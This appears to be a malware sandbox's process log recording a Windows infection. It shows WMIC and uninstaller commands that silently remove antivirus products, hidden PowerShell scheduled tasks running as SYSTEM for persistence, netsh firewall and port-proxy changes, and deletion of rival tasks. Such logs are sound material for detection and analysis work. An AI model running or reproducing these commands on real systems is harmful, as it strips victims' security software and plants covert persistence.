powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\ipc.jsp.ps1
2472cmd.exe "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
1980WMIC.exe wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
2168cmd.exe "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
2820WMIC.exe wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
3040cmd.exe "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
2836WMIC.exe wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
2452cmd.exe "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
1500WMIC.exe wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
2756cmd.exe "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
2716WMIC.exe wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
300cmd.exe "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
1560WMIC.exe wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
2264cmd.exe "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
2696WMIC.exe wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
2700cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart
2616schtasks.exe "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball1 /F /tr blackball1
3164schtasks.exe "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
3216schtasks.exe "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \802xIaZHLEP /F /tr "powershell -w hidden -c PS_CMD"
3280schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \802xIaZHLEP
3476schtasks.exe "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn VIl8p0azRYG\gV7HWSKROT /F /tr "powershell -w hidden -c PS_CMD"
4032schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn VIl8p0azRYG\gV7HWSKROT
3628schtasks.exe "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\ObEKaMCF03\6UhxPVJW1Sq /F /tr "powershell -w hidden -c PS_CMD"
3388schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\ObEKaMCF03\6UhxPVJW1Sq
3784netsh.exe netsh.exe firewall add portopening tcp 65529 SDNSd
4392netsh.exe "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
4620netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block
5064netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block
4428schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn t.pp6r1.com /F
5116schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa2 /F
4292schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa1 /F
3312schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa /F
1048